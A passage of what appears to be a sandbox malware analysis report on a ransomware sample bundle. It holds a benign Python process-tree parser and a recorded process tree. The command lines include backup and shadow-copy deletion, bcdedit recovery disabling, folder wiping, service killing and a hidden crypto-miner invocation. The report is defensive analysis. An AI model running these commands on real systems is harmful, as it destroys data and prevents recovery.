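SAMPLE_TABLE = (
    "PID 2772 wrote to memory of 2004 2772 taskmgr.exe 103 "
    "PID 1760 wrote to memory of 5092 1760 powershell.exe 110 "
    "PID 5092 wrote to memory of 2940 5092 cmd.exe 111 "
    "PID 5092 wrote to memory of 2940 5092 cmd.exe 111 "
    "PID 5092 wrote to memory of 3112 5092 cmd.exe 112 "
    "PID 5092 wrote to memory of 4888 5092 cmd.exe 116 "
    "PID 4888 wrote to memory of 1144 4888 HEUR-Trojan-Ransom.Win32.Generic-ea0663308264d011ded742ebb145cea6be39193596654979bd5a9f16b380aea3.exe 125 "
    "PID 1144 wrote to memory of 3464 1144 cmd.exe 184 "
    "PID 5092 wrote to memory of 32 5092 cmd.exe 130 "
    "PID 32 wrote to memory of 1472 32 Trojan-Ransom.Win32.Cryptor.edd-a39888f0df247072b57479e11d5536692035f10a8a2b18b5dd510a7d2fffcc3d.exe 131 "
    "PID 1472 wrote to memory of 1396 1472 Enhancement 135"
)

# The pid column repeats the parent PID (\1); the trailing number is the report's target index.
ENTRY = re.compile(r"PID (\d+) wrote to memory of (\d+) \1 (.+?) (\d+)(?= PID |$)")

# Kaspersky-style detection names used for the dropped samples in this report.
DETECTION_NAME = re.compile(r"^(HEUR-|UDS-)?Trojan-Ransom\.")


def parse_edges(text: str) -> list:
    """Ordered, de-duplicated (parent_pid, child_pid, parent_name) tuples."""
    seen, edges = set(), []
    for m in ENTRY.finditer(text):
        parent, child, name = int(m[1]), int(m[2]), m[3]
        if (parent, child) not in seen:
            seen.add((parent, child))
            edges.append((parent, child, name))
    return edges


def build_tree(edges: list):
    """Return (parent -> [children], pid -> name) for every process that wrote into another."""
    children, names = defaultdict(list), {}
    for parent, child, name in edges:
        children[parent].append(child)
        names[parent] = name
    return children, names


def lineage(edges: list, pid: int) -> list:
    """Walk parent links upward; returns [root_pid, ..., pid]."""
    parent_of = {child: parent for parent, child, _ in edges}
    chain = [pid]
    while chain[-1] in parent_of:
        chain.append(parent_of[chain[-1]])
    return list(reversed(chain))


def injecting_samples(edges: list) -> list:
    """Dropped samples that wrote into another process (the ones worth unpacking first)."""
    return sorted({name for _, _, name in edges if DETECTION_NAME.match(name)})


def render(edges: list) -> list:
    """Indented tree, one process per line; unnamed leaves print as '?'."""
    children, names = build_tree(edges)
    child_pids = {child for _, child, _ in edges}
    lines = []

    def walk(pid: int, depth: int) -> None:
        lines.append("  " * depth + f"{names.get(pid, '?')} ({pid})")
        for c in children.get(pid, []):
            walk(c, depth + 1)

    for root in [p for p in children if p not in child_pids]:
        walk(root, 0)
    return lines


if __name__ == "__main__":
    edges = parse_edges(SAMPLE_TABLE)
    print("\n".join(render(edges)))
    print("lineage of 3464:", lineage(edges, 3464))
    print("injecting samples:", injecting_samples(edges))
```

Joining this tree with the Processes section further down (which does carry image paths and command lines per PID) fills in the unnamed leaves; the two views are complementary because the WriteProcessMemory table also captures parents that the process list attributes to a different creator after a NtCreateProcessExOtherParentProcess call.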
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 1856 attrib.exe 1944 attrib.exe 1800 attrib.exe
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00426.7z"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3256
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /12⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2004 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"3⤵
- Boot or Logon Autostart Execution: Active Setup
- Drops desktop.ini file(s)
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
PID:728
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:5092 -
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.MSIL.Agent.gen-a6787985243f50e272c98fe15b21f461f892e8905bbc5ffd7018ca2694bc5079.exeHEUR-Trojan-Ransom.MSIL.Agent.gen-a6787985243f50e272c98fe15b21f461f892e8905bbc5ffd7018ca2694bc5079.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2940 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2940 -s 8964⤵
- Program crash
PID:2036
-
-
-
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.MSIL.Blocker.gen-186d9afa5f922ed9b4cb93853bd15496aeaf37d212f479c049fbd74c40d0b8af.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-186d9afa5f922ed9b4cb93853bd15496aeaf37d212f479c049fbd74c40d0b8af.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3112 -
C:\WINDOWS\explorer.exeC:\WINDOWS\explorer.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:7777 --user=44ZbNFaekfHa23g4diPcvAcMkqsmYpLvV9DjqgJwofqHCxtfukqzt3LHHr9Y8Ur8tnJJcLCqsyivmHgu6bzDuaYi5r9GR3S+150000 --pass=yagemob --cpu-max-threads-hint=50 --donate-level=5 --unam-idle-wait=2 --unam-idle-cpu=804⤵PID:5688
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.MSIL.Foreign.gen-4c8e0459524380a9f00ffc58913f461c3e1d8737dd18252881f09e2d416e4f73.exeHEUR-Trojan-Ransom.MSIL.Foreign.gen-4c8e0459524380a9f00ffc58913f461c3e1d8737dd18252881f09e2d416e4f73.exe3⤵
- Executes dropped EXE
PID:4432
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.Win32.Blocker.gen-2cf41c6c7b120dca73fc1b0145406c190c5ea38edf5f349387a51184359e82e6.exeHEUR-Trojan-Ransom.Win32.Blocker.gen-2cf41c6c7b120dca73fc1b0145406c190c5ea38edf5f349387a51184359e82e6.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:1740 -
C:\Users\Admin\AppData\Local\Fast\Fast.exe"C:\Users\Admin\AppData\Local\Fast\Fast.exe" /firstrun4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:5964 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 19245⤵
- Program crash
PID:1196
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.Win32.Encoder.gen-ce979ac72ae1a0e4c13109625c4eee0ad521ee72cf380642bcc8375739b82d29.exeHEUR-Trojan-Ransom.Win32.Encoder.gen-ce979ac72ae1a0e4c13109625c4eee0ad521ee72cf380642bcc8375739b82d29.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:648 -
C:\Users\Admin\AppData\Local\Temp\y_installer.exeC:\Users\Admin\AppData\Local\Temp\y_installer.exe --partner 351634 --distr /quiet /msicl "YABROWSER=y YAHOMEPAGE=y YAQSEARCH=y YABM=y VID=666"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:4896 -
C:\Users\Admin\AppData\Local\Temp\y_installer.exeC:\Users\Admin\AppData\Local\Temp\y_installer.exe --stat dwnldr/p=351634/cnt=0/dt=2/ct=2/rt=05⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4052
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.Win32.Generic-ea0663308264d011ded742ebb145cea6be39193596654979bd5a9f16b380aea3.exeHEUR-Trojan-Ransom.Win32.Generic-ea0663308264d011ded742ebb145cea6be39193596654979bd5a9f16b380aea3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4888 -
C:\Windows\system32\cmd.execmd /C "taskkill /F /IM sqlservr.exe /T"4⤵
- Suspicious use of WriteProcessMemory
PID:1144 -
C:\Windows\system32\taskkill.exetaskkill /F /IM sqlservr.exe /T5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3464
C:\Windows\system32\cmd.execmd /C "taskkill /F /IM sqlceip.exe /T"4⤵
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Windows\system32\taskkill.exetaskkill /F /IM sqlceip.exe /T5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3076
C:\Windows\system32\cmd.execmd /C "taskkill /F /IM sqlwriter.exe /T"4⤵PID:2632
C:\Windows\system32\taskkill.exetaskkill /F /IM sqlwriter.exe /T5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1724
C:\Windows\system32\cmd.execmd /C "rmdir C:\Users\Admin\AppData /s /q"4⤵PID:3904
C:\Windows\system32\cmd.execmd /C "rmdir C:\Users\Default\AppData /s /q"4⤵PID:4076
C:\Windows\system32\cmd.execmd /C "rmdir C:\Users\Public\AppData /s /q"4⤵PID:2836
C:\Windows\system32\cmd.execmd /C "attrib +h +s Encrypt.exe"4⤵
- Hide Artifacts: Hidden Files and Directories
PID:2008 -
C:\Windows\system32\attrib.exeattrib +h +s Encrypt.exe5⤵
- Views/modifies file attributes
PID:1856
C:\Windows\system32\cmd.execmd /C "net stop MSSQL$SQLEXPRESS"4⤵PID:3292
C:\Windows\system32\net.exenet stop MSSQL$SQLEXPRESS5⤵PID:3484
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS6⤵PID:3832
C:\Windows\system32\cmd.execmd /C "rmdir F:\$Recycle.Bin /s /q"4⤵PID:4312
C:\Windows\system32\cmd.execmd /C "rmdir C:\$Recycle.Bin /s /q"4⤵PID:1224
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.Win32.Makop.gen-9ddffccd20b4260116e889b979e21e772848a457cb6b17a2664a4ee12aa9199f.exeHEUR-Trojan-Ransom.Win32.Makop.gen-9ddffccd20b4260116e889b979e21e772848a457cb6b17a2664a4ee12aa9199f.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2096 -
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.Win32.Makop.gen-9ddffccd20b4260116e889b979e21e772848a457cb6b17a2664a4ee12aa9199f.exeHEUR-Trojan-Ransom.Win32.Makop.gen-9ddffccd20b4260116e889b979e21e772848a457cb6b17a2664a4ee12aa9199f.exe4⤵PID:1928
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 9004⤵
- Program crash
PID:3832
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exeHEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\0dda7230-3da2-4000-b101-6367093b30da" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4244
C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe"C:\Users\Admin\Desktop\00426\HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:6092 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\ebae5ddd-6f41-43a7-af86-4b49c73c4f64" /deny *S-1-1-0:(OI)(CI)(DE,DC)5⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5220
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 20844⤵
- Program crash
PID:2076
C:\Users\Admin\Desktop\00426\Trojan-Ransom.MSIL.Blocker.aw-f4ca0ba460f6423e6168c27d45dc590bbd79774be4aee3804e0b5ec961ab97fa.exeTrojan-Ransom.MSIL.Blocker.aw-f4ca0ba460f6423e6168c27d45dc590bbd79774be4aee3804e0b5ec961ab97fa.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
PID:1556 -
C:\Users\Admin\AppData\Roaming\Chromium Updater Module.exe"C:\Users\Admin\AppData\Roaming\Chromium Updater Module.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies Internet Explorer settings
PID:632
C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Blocker.jzec-ed34ead6ec6c362e85707d8a4ce385f6a967e155242be57ee4ee7235759d9870.exeTrojan-Ransom.Win32.Blocker.jzec-ed34ead6ec6c362e85707d8a4ce385f6a967e155242be57ee4ee7235759d9870.exe3⤵
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:2076
C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Blocker.mvwo-8f4df1b11998017853ed5d0f009f461275cdd73f9c274d865fd11c36f6280118.exeTrojan-Ransom.Win32.Blocker.mvwo-8f4df1b11998017853ed5d0f009f461275cdd73f9c274d865fd11c36f6280118.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4200
C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Cryptor.edd-a39888f0df247072b57479e11d5536692035f10a8a2b18b5dd510a7d2fffcc3d.exeTrojan-Ransom.Win32.Cryptor.edd-a39888f0df247072b57479e11d5536692035f10a8a2b18b5dd510a7d2fffcc3d.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:32 -
C:\Users\Admin\AppData\Roaming\AccessRendezvous\EnhancementC:\Users\Admin\AppData\Roaming\AccessRendezvous\Enhancement /go4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Windows\SYSTEM32\cmd.execmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Roaming\AccessRendezvous\Enhancement" & del "C:\Users\Admin\AppData\Roaming\AccessRendezvous\Enhancement" & rd "C:\Users\Admin\AppData\Roaming\AccessRendezvous\"5⤵PID:1396
C:\Windows\system32\waitfor.exewaitfor /t 10 pause /d y6⤵PID:4396
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\AppData\Roaming\AccessRendezvous\Enhancement"6⤵
- Views/modifies file attributes
PID:1800
C:\Windows\SYSTEM32\cmd.execmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Cryptor.edd-a39888f0df247072b57479e11d5536692035f10a8a2b18b5dd510a7d2fffcc3d.exe" & del "C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Cryptor.edd-a39888f0df247072b57479e11d5536692035f10a8a2b18b5dd510a7d2fffcc3d.exe" & rd "C:\Users\Admin\Desktop\00426\"4⤵
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\system32\waitfor.exewaitfor /t 10 pause /d y5⤵PID:4644
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Cryptor.edd-a39888f0df247072b57479e11d5536692035f10a8a2b18b5dd510a7d2fffcc3d.exe"5⤵
- Views/modifies file attributes
PID:1944
C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Encoder.lqn-5fd1a714a3c72c00cc9cbcdf8f100c2e8e8e475354c8c582d1711e737c398423.exeTrojan-Ransom.Win32.Encoder.lqn-5fd1a714a3c72c00cc9cbcdf8f100c2e8e8e475354c8c582d1711e737c398423.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\SayCheese.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\SayCheese.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:736 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\config.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\config.exe"5⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
PID:1672
C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Gimemo.besk-bcc15645592a6add5c91d3d097e63e8775b949be72de33fd7b06c5197c9a40fe.exeTrojan-Ransom.Win32.Gimemo.besk-bcc15645592a6add5c91d3d097e63e8775b949be72de33fd7b06c5197c9a40fe.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3672
C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Gimemo.cdqu-e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd.exeTrojan-Ransom.Win32.Gimemo.cdqu-e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd.exe3⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:436
C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Locky.bim-fb0f5ff4760f6869a63fc6ed01d19241d83919b88f70343473cb6af014fa8954.exeTrojan-Ransom.Win32.Locky.bim-fb0f5ff4760f6869a63fc6ed01d19241d83919b88f70343473cb6af014fa8954.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1164 -
C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Locky.bim-fb0f5ff4760f6869a63fc6ed01d19241d83919b88f70343473cb6af014fa8954.exe"C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Locky.bim-fb0f5ff4760f6869a63fc6ed01d19241d83919b88f70343473cb6af014fa8954.exe"4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks SCSI registry key(s)
PID:5556
C:\Users\Admin\Desktop\00426\Trojan-Ransom.Win32.Vega.ap-b7f96fbb9844cac5c7f4ec966683f3564bbb9a2f453927e1c579dcb0154f5f83.exeTrojan-Ransom.Win32.Vega.ap-b7f96fbb9844cac5c7f4ec966683f3564bbb9a2f453927e1c579dcb0154f5f83.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4000 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -start4⤵
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
PID:2996 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete5⤵
- System Location Discovery: System Language Discovery
PID:1176 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5948
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no5⤵
- System Location Discovery: System Language Discovery
PID:5256
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures5⤵
- System Location Discovery: System Language Discovery
PID:5184
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet5⤵
- System Location Discovery: System Language Discovery
PID:5304
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet5⤵
- System Location Discovery: System Language Discovery
PID:4276
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat5⤵
- System Location Discovery: System Language Discovery
PID:5568 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete6⤵
- System Location Discovery: System Language Discovery
PID:1076
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -agent 05⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:3404
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -agent 15⤵
- Executes dropped EXE
PID:5432
C:\Windows\SysWOW64\notepad.exenotepad.exe4⤵
- System Location Discovery: System Language Discovery
PID:3316
C:\Users\Admin\Desktop\00426\UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exeUDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1908 -
C:\Users\Admin\AppData\Local\Temp\cetrainers\CETD4CF.tmp\UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe"C:\Users\Admin\AppData\Local\Temp\cetrainers\CETD4CF.tmp\UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe" -ORIGIN:"C:\Users\Admin\Desktop\00426\"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3516 -
C:\Users\Admin\AppData\Local\Temp\cetrainers\CETD4CF.tmp\extracted\UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exeC:\Users\Admin\AppData\Local\Temp\cetrainers\CETD4CF.tmp\extracted\UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe "C:\Users\Admin\AppData\Local\Temp\cetrainers\CETD4CF.tmp\extracted\CET_TRAINER.CETRAINER" "-ORIGIN:C:\Users\Admin\Desktop\00426\"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4172 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start http://mrantifun.net/6⤵
- System Location Discovery: System Language Discovery
PID:4668 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://mrantifun.net/7⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:4720 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffbc80b46f8,0x7ffbc80b4708,0x7ffbc80b47188⤵PID:1944
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,8749606535712032693,10898752533499901679,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:28⤵PID:752
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,8749606535712032693,10898752533499901679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:38⤵PID:4132
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,8749606535712032693,10898752533499901679,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2464 /prefetch:88⤵PID:5096
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,8749606535712032693,10898752533499901679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:18⤵PID:3064
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,8749606535712032693,10898752533499901679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:18⤵PID:4376
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,8749606535712032693,10898752533499901679,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3908 /prefetch:18⤵PID:3464
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,8749606535712032693,10898752533499901679,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2900 /prefetch:18⤵PID:2628
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,8749606535712032693,10898752533499901679,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4500 /prefetch:18⤵PID:5184
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,8749606535712032693,10898752533499901679,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4508 /prefetch:18⤵PID:5256
